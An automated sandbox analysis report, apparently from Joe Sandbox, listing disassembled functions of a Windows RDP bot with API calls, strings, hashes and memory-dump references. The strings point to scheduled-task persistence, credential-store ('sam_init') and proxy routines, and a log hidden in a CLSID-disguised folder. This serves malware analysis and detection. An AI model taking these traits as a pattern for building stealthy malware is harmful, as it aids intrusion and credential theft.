Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-4168131722
Opcode ID: 200db34d868ae22f615fe2cb7234150327386c8e163d3b97334c3f0f365d0a91
Instruction ID: b17fb35071a02cb5b6b81c2100e39e19c20e62f1704a0388408fb5d45d67e3dc
Opcode Fuzzy Hash: 200db34d868ae22f615fe2cb7234150327386c8e163d3b97334c3f0f365d0a91
Instruction Fuzzy Hash: AB413A61B0DF4799FA108B4AEA403FC2260AB12BA9F4451F7EB0D0A9B5DF3DB555C300

Function 00007FFE11ECA6E9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11ECA7DD

Strings

NULL, xrefs: 00007FFE11ECA854
version, xrefs: 00007FFE11ECA6E9, 00007FFE11ECA6ED
(name != NULL), xrefs: 00007FFE11ECA75E
ini_get_sec, xrefs: 00007FFE11ECA732, 00007FFE11ECA765, 00007FFE11ECA798, 00007FFE11ECA7F6, 00007FFE11ECA834
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE11ECA83B
[D] (%s) -> Done(name=%s), xrefs: 00007FFE11ECA7FD
(sec != NULL), xrefs: 00007FFE11ECA791
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11ECA724, 00007FFE11ECA757, 00007FFE11ECA78A
(ini != NULL), xrefs: 00007FFE11ECA72B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11ECA739, 00007FFE11ECA76C, 00007FFE11ECA79F
main, xrefs: 00007FFE11ECA6EC

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-4168131722
Opcode ID: 0e0f18d63ba03ef00a4ee5e6d0c7fc764c1628c0adc18eaf3918b519abf3f823
Instruction ID: 879cfb8898a7fa752b27866a31cd093238887839bb9dcaf3a275c61fc111e022
Opcode Fuzzy Hash: 0e0f18d63ba03ef00a4ee5e6d0c7fc764c1628c0adc18eaf3918b519abf3f823
Instruction Fuzzy Hash: 1D413B62E48E8795FF108B82ED403B66368BB40368F8454B6EA1D161B1EF3CF946C340

Function 00007FFE11BDA57E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11BDA593
LeaveCriticalSection.KERNEL32 ref: 00007FFE11BDA5F9
GetProcessHeap.KERNEL32 ref: 00007FFE11BDA630
HeapAlloc.KERNEL32 ref: 00007FFE11BDA644

Strings

(handler != NULL), xrefs: 00007FFE11BDA5B1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11BDA5BF
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE11BDA61B
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11BDA6BC
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11BDA68B
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE11BDA5AA
ebus_subscribe, xrefs: 00007FFE11BDA5B8, 00007FFE11BDA614, 00007FFE11BDA6B5
mem_alloc, xrefs: 00007FFE11BDA684

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 51182e06d6a6c07dd0c69d8f58770b2ddf4b90986f4ad3826cd256bf4d6556e1
Instruction ID: 23b2f6fded784e6e7fd6d1f798ff41a460e9089ac7adefe450a44d8cb011467a
Opcode Fuzzy Hash: 51182e06d6a6c07dd0c69d8f58770b2ddf4b90986f4ad3826cd256bf4d6556e1
Instruction Fuzzy Hash: 6431F860A0ED43C1EF399F27E850EB82269AF40B78F4860B5D84D073B0EF2DE9458300

Function 00007FFE1A4F293E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE1A4F2953
LeaveCriticalSection.KERNEL32 ref: 00007FFE1A4F29B9
GetProcessHeap.KERNEL32 ref: 00007FFE1A4F29F0
HeapAlloc.KERNEL32 ref: 00007FFE1A4F2A04

Strings

ebus_subscribe, xrefs: 00007FFE1A4F2978, 00007FFE1A4F29D4, 00007FFE1A4F2A75
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE1A4F2A7C
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1A4F2A4B
(handler != NULL), xrefs: 00007FFE1A4F2971
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE1A4F296A
mem_alloc, xrefs: 00007FFE1A4F2A44
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE1A4F29DB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A4F297F

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 1fdef6017acd4eadc507ca945bc6e3cc2d7f989b2ba6436f0cb6a46bc0386b84
Instruction ID: cc4fbd2ba5b9331dde74d5eb557179590991ecdcf6f1f891b6479797687edb95
Opcode Fuzzy Hash: 1fdef6017acd4eadc507ca945bc6e3cc2d7f989b2ba6436f0cb6a46bc0386b84
Instruction Fuzzy Hash: 8F310A61F0DE1381FA109B0BE9407BD2661AF52FB5F58A4F7C94D1B2B0EE3CA9558300

Function 00007FFE1A5262BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE1A5262D3
LeaveCriticalSection.KERNEL32 ref: 00007FFE1A526339
GetProcessHeap.KERNEL32 ref: 00007FFE1A526370
HeapAlloc.KERNEL32 ref: 00007FFE1A526384

Strings

(handler != NULL), xrefs: 00007FFE1A5262F1
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1A5263CB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A5262FF
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE1A52635B
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE1A5263FC
ebus_subscribe, xrefs: 00007FFE1A5262F8, 00007FFE1A526354, 00007FFE1A5263F5
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE1A5262EA
mem_alloc, xrefs: 00007FFE1A5263C4

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 8ec8188f99a1aa25ad3b08fcfe056561c71c8757641c3a94cbd517e3ed549982
Instruction ID: 104f7a2656d5c51aa5e70f9d279ef9269b5f3c7545f7de2fc30a234361dcbc4b
Opcode Fuzzy Hash: 8ec8188f99a1aa25ad3b08fcfe056561c71c8757641c3a94cbd517e3ed549982
Instruction Fuzzy Hash: 48310A61B0DD46C1FA258B47E8806792362FF96FB4F5844FBC84D07AB1EE2CE8459360

Function 00007FFE115015BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE115015D3
LeaveCriticalSection.KERNEL32 ref: 00007FFE11501639
GetProcessHeap.KERNEL32 ref: 00007FFE11501670
HeapAlloc.KERNEL32 ref: 00007FFE11501684

Strings

C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE115015EA
(handler != NULL), xrefs: 00007FFE115015F1
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE115016CB
ebus_subscribe, xrefs: 00007FFE115015F8, 00007FFE11501654, 00007FFE115016F5
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE115016FC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115015FF
mem_alloc, xrefs: 00007FFE115016C4
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE1150165B

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 95a5f0df4977a900e9c23a46bbbbec40125fbf8d14d65270acb87fda012b2c4b
Instruction ID: 34ee8cf7fcc4c06e930cf4f08cf8f534cdda8eef1b9a615a2f8246792f8b38c0
Opcode Fuzzy Hash: 95a5f0df4977a900e9c23a46bbbbec40125fbf8d14d65270acb87fda012b2c4b
Instruction Fuzzy Hash: 44311C61E09E1381FB119B87ECA03B8366AAF50BB4F5850B9C94D1B6B0EF6DE945C301

Function 00007FFE11EC15BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11EC15D3
LeaveCriticalSection.KERNEL32 ref: 00007FFE11EC1639
GetProcessHeap.KERNEL32 ref: 00007FFE11EC1670
HeapAlloc.KERNEL32 ref: 00007FFE11EC1684

Strings

ebus_subscribe, xrefs: 00007FFE11EC15F8, 00007FFE11EC1654, 00007FFE11EC16F5
(handler != NULL), xrefs: 00007FFE11EC15F1
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE11EC15EA
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11EC16FC
mem_alloc, xrefs: 00007FFE11EC16C4
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE11EC165B
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11EC16CB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC15FF

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: d7eaba8990d9bb82a883ab9eac106acf4eb305b5d3dced1ada31524724a4bca5
Instruction ID: 6924f338594ddcf80a59e0a6c7b8134697ea9d379810d5aa05970ff0fd0a9ac9
Opcode Fuzzy Hash: d7eaba8990d9bb82a883ab9eac106acf4eb305b5d3dced1ada31524724a4bca5
Instruction Fuzzy Hash: A13105A1E0DE0381FF109B97EC503762369AF41BA4F9895B5C94E0B2B0EE2CF945D340

Function 00007FFE11BDA076 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11BDA091
GetLastError.KERNEL32 ref: 00007FFE11BDA0D0

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

~, xrefs: 00007FFE11BDA14B
, xrefs: 00007FFE11BDA0EE
Done, xrefs: 00007FFE11BDA0A9
[I] (%s) -> %s, xrefs: 00007FFE11BDA0B7
proxy_init, xrefs: 00007FFE11BDA0B0, 00007FFE11BDA0DB, 00007FFE11BDA196
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11BDA19D
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu), xrefs: 00007FFE11BDA0E2
P, xrefs: 00007FFE11BDA150

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
API String ID: 3179112426-3318474754
Opcode ID: 62679cb6203fdb9ce5ed245b295c2cc3eaac5c932b8f41fb294838f1a43f0853
Instruction ID: c8841fd074df91db8b42ba678752104f75a3a4f48eca73b025b0ac0ee58f5b7b
Opcode Fuzzy Hash: 62679cb6203fdb9ce5ed245b295c2cc3eaac5c932b8f41fb294838f1a43f0853
Instruction Fuzzy Hash: 8931A454E0DE07E1FF384F3798C0BF8625C9B0A7B9F5161B6C50E461B1DE6DA8849345

Function 00007FFE11508F74 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11508F85
GetLastError.KERNEL32 ref: 00007FFE11508FC4

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

P, xrefs: 00007FFE11509044
, xrefs: 00007FFE11508FE2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11509091
[I] (%s) -> %s, xrefs: 00007FFE11508FAB
Done, xrefs: 00007FFE11508F9D
~, xrefs: 00007FFE1150903F
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu), xrefs: 00007FFE11508FD6
sam_init, xrefs: 00007FFE11508FA4, 00007FFE11508FCF, 00007FFE1150908A

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
API String ID: 3179112426-2019511216
Opcode ID: 5236b7cafe3e81f03fa3fcf6ea0a404faa5786d7186034cc21a0b78ad4f40b1b
Instruction ID: 408b9f8b9df0c22e9e9936db1930176e84aa902b1983ca09415d6096e6aeff44
Opcode Fuzzy Hash: 5236b7cafe3e81f03fa3fcf6ea0a404faa5786d7186034cc21a0b78ad4f40b1b
Instruction Fuzzy Hash: 0031EB10F0DE0381FB61979A94E43BE127A9F44374F2005BAC55E462B9BE5EA999C382

Function 00007FFE11EC9510 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 145stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11EC95AA
strlen.MSVCRT ref: 00007FFE11EC95C6
strlen.MSVCRT ref: 00007FFE11EC95D7
strlen.MSVCRT ref: 00007FFE11EC9611
strlen.MSVCRT ref: 00007FFE11EC962D
strcpy.MSVCRT ref: 00007FFE11EC9649
strlen.MSVCRT ref: 00007FFE11EC9651
strlen.MSVCRT ref: 00007FFE11EC9660
strlen.MSVCRT ref: 00007FFE11EC9675

Strings

*, xrefs: 00007FFE11EC9656
schtasks, xrefs: 00007FFE11EC95DF

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strlen$strcpy
String ID: *$schtasks
API String ID: 2790333442-2394224502
Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
Instruction ID: 395646837e5e64cf676b35577a8927af8941720aff268b8ac49ecc60cf689f4e
Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
Instruction Fuzzy Hash: 9C51A612B0CE8345FB616B97EC503BB5659AB853A4FD810B5EA4E473E6EE2CF904C700

Function 00007FFE126E378B Relevance: 16.6, APIs: 7, Strings: 4, Instructions: 104memorysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE126E2ECA: recv.WS2_32 ref: 00007FFE126E2EF2

Sleep.KERNEL32 ref: 00007FFE126E37E3

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

LeaveCriticalSection.KERNEL32 ref: 00007FFE126E3828
memcpy.MSVCRT ref: 00007FFE126E3844
GetProcessHeap.KERNEL32 ref: 00007FFE126E3866
HeapAlloc.KERNEL32 ref: 00007FFE126E3877
memcpy.MSVCRT ref: 00007FFE126E3898
EnterCriticalSection.KERNEL32 ref: 00007FFE126E38F0

Strings

mem_alloc, xrefs: 00007FFE126E37FE
routine_rx, xrefs: 00007FFE126E38D6
[D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE126E38DD
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE126E3805

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
API String ID: 3537583691-1494920791
Opcode ID: 87de16ef6bca2d18c87270835ec864a3ef1168e45208d2f4b5260ae955c6280e
Instruction ID: 107e93b4158e2a6c11c226bedfdd5798f5d7d1143fed92a80b68dad4051f4ac2
Opcode Fuzzy Hash: 87de16ef6bca2d18c87270835ec864a3ef1168e45208d2f4b5260ae955c6280e
Instruction Fuzzy Hash: 35416A62A08E4295EB10CF12EC543BA37A0EB48BA8F5441B5D94D477E8EFBCE559C344

Function 00007FF7C1AB2EF2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FF7C1AB2F9E
fflush.MSVCRT ref: 00007FF7C1AB2FAA
EnterCriticalSection.KERNEL32(service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB2027,?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB2FC3
LeaveCriticalSection.KERNEL32(?,00007FF7C1AC8500,00007FF7C1AB2027,?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB2FEB
CopyFileA.KERNEL32 ref: 00007FF7C1AB3048

Strings

., xrefs: 00007FF7C1AB302D
service, xrefs: 00007FF7C1AB2EF5
1, xrefs: 00007FF7C1AB3032
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF7C1AB300B

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
API String ID: 513531256-4171087551
Opcode ID: 28729dc196237c3a5edda3b9aee5b2e910e9e2580ecbd5e398dc6ed96b28f2b5
Instruction ID: 16ed509116364ca5f9712a07da483093a6a5db660edc45876c2739817600c5b9
Opcode Fuzzy Hash: 28729dc196237c3a5edda3b9aee5b2e910e9e2580ecbd5e398dc6ed96b28f2b5
Instruction Fuzzy Hash: 0C416F75A0868586F320FF14E865BADE290BB847A0FC44037DE0D57796CFBEA551C720

Function 00007FFE11BDC852 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE11BDC8FE
fflush.MSVCRT ref: 00007FFE11BDC90A
